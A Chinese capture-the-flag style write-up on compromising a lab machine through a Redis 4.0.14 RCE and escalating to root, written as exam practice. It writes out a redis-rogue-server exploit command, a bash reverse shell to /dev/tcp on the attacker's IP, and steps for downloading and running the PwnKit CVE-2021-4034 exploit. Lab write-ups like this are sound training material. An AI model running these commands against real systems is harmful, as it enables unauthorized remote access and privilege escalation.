攻击链
端口信息收集---按照版本搜索EXP---利用---使用linpeas找到通用提权漏洞---完成提权
难度
中等
知识点
Redis key-value store 4.0.14 RCE漏洞
过程
信息收集

突破边界
6379redis应该是这个靶机的考点。我exploit搜索了关键词对应的漏洞。没有利用成功。

我认为红框部分的两个漏洞是最有可能性的,但是都没利用成功,不排除我msf用错了。此处按下不表。先写其他方法。接着,我也不知道其他人是怎么知道用以下这个脚本的。。
难点是要正好搜到WP上用的工具并正确使用,但是我基本每次都搜不到,要么就用错了,要么放弃了正确的路线要么在错误的路线上反复尝试。这里应该搞清楚如何最高效率的搜索并筛选信息。

在无redis知识前提下,显然,此处要用的是redis的RCE。

有个RCE,底下提供了msf的利用步骤。试试看,


没这个模块,换一个利用,


访问权限拒绝。显然,那俩漏洞对应的msf模块的
exploit/linux/redis/redis_replication_cmd_exec 2018-11-13 good

考试不让用AI,所以我的判断方法是:找了一下msf的search结果,没有其他的可用的or和这俩漏洞相近的。
exploitdb搜索不成就用谷歌搜索。

有的exp只提供脚本,运行时需要的文件还得找半天,倾向使用直接能用或者附带所需文件的脚本,节约时间。
第一个能用的脚本
https://github.com/jas502n/Redis-RCE

我其实不知道其他WP是怎么忽然就能用对脚本的,我认为应该提供一个可实行的路径,在没有任何提示的时候是能找到正确的用。
第二个能用的脚本
https://github.com/n0b0dyCN/redis-rogue-server?source=post_page-----49920d4188de---------------------------------------

不一样的是,其他WP在用了这个脚本以后,会弹出这种提示,

我不知道我的为啥没有,但是我可以直接用反弹shell连接回去:
python redis-rogue-server.py --rhost 192.168.249.176 --lhost 192.168.45.152
/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.152/4444 0>&1'


提权
运行linpeas.sh,可尝试用PwnKit
https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
./cve-2021-4034.sh
./pwnkit
直接下载过去,然后运行里边的sh脚本就行了。

官方WP的提权手段涉及逆向,考试不考逆向,此处不分析。
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)



